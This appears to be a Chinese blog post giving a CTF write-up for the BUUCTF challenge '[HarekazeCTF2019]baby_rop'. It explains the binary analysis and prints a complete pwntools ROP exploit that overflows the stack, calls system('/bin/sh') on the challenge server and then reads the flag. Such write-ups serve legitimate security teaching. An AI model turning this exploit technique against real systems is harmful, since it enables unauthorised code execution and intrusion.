buuctf|[HarekazeCTF2019]baby_rop 1

嚯霍嚯

 关注

阅读 55

2022-05-02

buuctf|[HarekazeCTF2019]baby_rop 1

分析

下载文件重命名为pwn_15,checksec一下
在这里插入图片描述
只开启了NX,64位,用ida看看
在这里插入图片描述
这里可以栈溢出,同时在侧面看到了system()

shift+F12查看字符串在这里插入图片描述

在这里插入图片描述
找到binsh,由于是64位,我们要寄存器传参,ROPgadget下
在这里插入图片描述

exp如下

from pwn import*

p=remote('node4.buuoj.cn',25977)
#p=process("./pwn_15")

system_addr=0x400490
binsh_addr=0x601048
ret_addr=0x400479
popdi_addr=0x400683

payload=b'A'*0x18+p64(ret_addr)+p64(popdi_addr)+p64(binsh_addr)+p64(system_addr)
p.sendline(payload)

p.interactive()

flag

拿到控制权后

find -name flag

找到地址后cat,得flag
在这里插入图片描述

相关推荐

BUUCTF|PWN-[HarekazeCTF2019]baby_rop2-WP

柠檬果然酸 85 0 0

[BUUCTF-pwn] [HarekazeCTF2019]Ramen

敬亭阁主 47 0 0

[BUUCTF-pwn] [HarekazeCTF2019]Harekaze Note

zhoulujun 31 0 0

BUUCTF [De1CTF2019]cplusplus

以沫的窝 82 0 0

BUUCTF 极客大挑战2019 Upload 1

幸福的无所谓 40 0 0

BUUCTF [GXYCTF2019]Ping Ping Ping 1

晒大太阳了 217 0 0

BUUCTF:[SUCTF 2019]Pythonginx

朱小落 46 0 0

BUUCTF:[BSidesCF 2019]Kookie

googlefrank 49 0 0

[BUUCTF][GWCTF 2019]mypassword

五殳师兄 124 0 0

【BUUCTF】[GXYCTF2019]Ping Ping Ping1

开源GIS定制化开发方案 197 0 0

精彩评论(0)

0 0 举报